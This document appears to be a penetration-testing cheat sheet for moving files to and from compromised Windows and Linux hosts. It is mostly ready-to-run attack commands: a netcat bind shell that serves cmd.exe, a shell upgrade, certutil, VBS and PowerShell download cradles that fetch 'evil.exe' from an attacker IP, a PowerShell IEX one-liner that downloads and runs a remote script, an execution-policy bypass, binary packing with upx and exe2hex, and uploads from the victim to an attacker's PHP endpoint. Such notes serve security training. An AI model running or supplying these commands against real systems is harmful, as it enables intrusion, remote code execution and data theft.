File transfers

// File Transfers

// CertUtil
certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt

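// HTTP server (SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is: python3 -m http.server 80)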
python -m SimpleHTTPServer 80
// Browser
// navigate directly to the file
// FTP
python -m pyftpdlib 21 (attacking machine)
ftp 10.10.10.10
// On Linux we can simply use wget

// File transfer notes
sudo apt update && sudo apt -y install pure-ftpd

cat setup-ftp.sh

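# setup-ftp.sh: create a dedicated, shell-less system account and a Pure-FTPd
# virtual user ("offsec") whose files live under /ftphome. Run as root.
# NOTE: plain FTP is unencrypted, so the virtual user's password and every
# transferred file cross the network in cleartext.

# Dedicated group and system user that own the FTP data; the user gets no
# usable home (/dev/null) and no valid login shell (/etc).
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser

# Virtual user mapped onto ftpuser with /ftphome as its home directory;
# pure-pw prompts for the password interactively.
pure-pw useradd offsec -u ftpuser -d /ftphome
# Compile the virtual-user list into the PureDB database.
pure-pw mkdb

# Enable PureDB authentication by linking its config into the auth directory.
# Stop if the directory is missing so the symlink is not created elsewhere.
cd /etc/pure-ftpd/auth/ || exit 1
ln -s ../conf/PureDb 60pdb

# Create the virtual user's home and hand it to the system account.
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
systemctl restart pure-ftpd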

non-interactive shell (lacks useful features such as tab completion, and you don't get standard output)
interactive shell (requires user interaction)

Upgrading a non-interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'

transferring files with windows hosts
non-interactive ftp download
nc.exe -lvnp 4444 -e cmd.exe
sudo cp /usr/share/windows-resources/binaries/nc.exe /ftphome/
sudo systemctl restart pure-ftpd
echo open 1.2.3.4 21>ftp.txt
echo USER test >>ftp.txt
echo lab >>ftp.txt
echo bin >>ftp.txt
echo GET nc.exe >>ftp.txt
echo bye >>ftp.txt
ftp -v -n -s:ftp.txt
// wget.vbs
// windows downloads using scripting languages
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs


#After you've created wget.vbs
cscript wget.vbs http://1.2.3.4/evil.exe evil.exe

// powershell wget
echo $webclient = New-Object System.Net.Webclient >>wget.ps1
echo $url = "http://1.2.3.4/file.exe" >> wget.ps1
echo $file = "evil.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
echo $webclient = New-Object System.Net.Webclient >>wget.ps1

// powershell execution
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://1.23.4/hello.ps1')


// Windows downloads with exe2hex and powershell
upx -9 nc.exe
exe2hex -x nc.exe -p nc.cmd
head -n 3 nc.cmd
cat nc.cmd | xclip -selection clipboard

// windows uploads using windows scripting languages
cat /var/www/html/upload.php
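<?php
// Receives one multipart upload in the "file" field and stores it under
// /var/www/uploads/ (presumably outside the web root, given that this script
// itself lives in /var/www/html, so stored files are not served back).
// There is no authentication and no size or type restriction: anyone who can
// reach this script can write files into that directory.
$uploaddir = '/var/www/uploads/';

// Reject requests without a successfully received "file" part.
if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    http_response_code(400);
    exit;
}

// The name is client-supplied; basename() guarantees no directory component
// survives, whatever the runtime has already stripped, so the destination
// always stays directly inside $uploaddir.
$uploadfile = $uploaddir . basename($_FILES['file']['name']);

// move_uploaded_file() only moves files that arrived through an HTTP upload.
if (!move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
    http_response_code(500);
}
?>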

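# Create the upload directory and give it to the web-server account so that
# upload.php (assumed to run as www-data) can write into it. Owner-only write
# access is enough; a world-writable (777) directory would let every local
# account add, replace or delete the uploaded files.
sudo mkdir -p /var/www/uploads
sudo chown www-data: /var/www/uploads
sudo chmod 755 /var/www/uploads/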

powershell (New-Object System.Net.Webclient).UploadFile('http://1.2.3.4/upload.php','file.exe')

// Uploading files via TFTP
sudo apt -y install atftp
sudo mkdir /tftp
sudo atftpd --daemon --port 69 /tftp

tftp -i 1.2.3.4 put file.exe
